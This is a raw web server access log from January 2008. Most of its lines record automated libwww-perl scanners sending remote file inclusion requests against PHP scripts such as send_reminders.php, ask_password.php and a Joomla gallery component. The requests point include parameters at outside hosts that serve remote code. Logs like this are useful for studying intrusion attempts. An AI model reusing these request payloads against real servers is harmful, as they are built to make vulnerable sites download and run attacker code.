218.188.2.137 - - [03/Jan/2008:02:03:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:03:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.248.172 - - [03/Jan/2008:02:03:15 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:03:17 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:03:17 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:03:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:03:21 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:03:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:03:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:03:53 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:03:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:03:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:03:57 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:03:58 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:03:58 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:04:23 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:04:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:04:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:04:32 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:04:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:04:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:04:47 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:04:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:04:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:05:00 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:05:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:05:01 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:05:37 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:05:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:05:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:05:46 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:05:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:05:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.28 - - [03/Jan/2008:02:06:44 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:02:07:24 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:08:19 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:08:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:08:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.32.229 - - [03/Jan/2008:02:09:33 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.229 - - [03/Jan/2008:02:09:33 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.229 - - [03/Jan/2008:02:09:34 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:02:09:43 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:02:09:43 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:02:09:43 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.199.33.91 - - [03/Jan/2008:02:09:56 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://216.126.65.86/dev/cgi-bin/cgi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.87.246 - - [03/Jan/2008:02:10:09 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.100.218 - - [03/Jan/2008:02:10:21 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.100.218 - - [03/Jan/2008:02:10:21 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.100.218 - - [03/Jan/2008:02:10:22 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:45 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:45 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:46 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:10:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:02:10:49 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:02:10:49 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:02:10:49 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:11:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.99.161 - - [03/Jan/2008:02:11:55 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [03/Jan/2008:02:11:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [03/Jan/2008:02:11:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:02:12:54 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:02:12:54 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:02:12:54 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:02:14:05 -0800] "GET /megumi/earrings/7_Venetian_D_Blue_15.JPG HTTP/1.1" 200 3658272 "-" "Googlebot-Image/1.0" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:15:49 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:15:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:15:49 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:15:56 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.199.33.91 - - [03/Jan/2008:02:16:06 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://216.126.65.86/dev/cgi-bin/cgi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.199.33.91 - - [03/Jan/2008:02:16:07 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://216.126.65.86/dev/cgi-bin/cgi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:13 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:32 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:02:16:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.123.207.130 - - [03/Jan/2008:02:17:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:17:33 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:17:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:17:34 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:17:35 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:17:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:17:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:18:00 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:18:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:18:01 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:18:09 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:18:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:02:18:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:18:19 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:18:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:18:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:18:30 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:18:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:18:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.141.193 - - [03/Jan/2008:02:18:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:21:05 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:21:05 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:21:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.99.161 - - [03/Jan/2008:02:21:34 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [03/Jan/2008:02:21:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [03/Jan/2008:02:21:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:01 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:01 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:02 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:13 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:13 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:14 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:46 -0800] "GET /logs/access_071218.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:02:22:55 -0800] "GET /logs/access_071218.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.148.56 - - [03/Jan/2008:02:23:14 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [03/Jan/2008:02:23:14 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
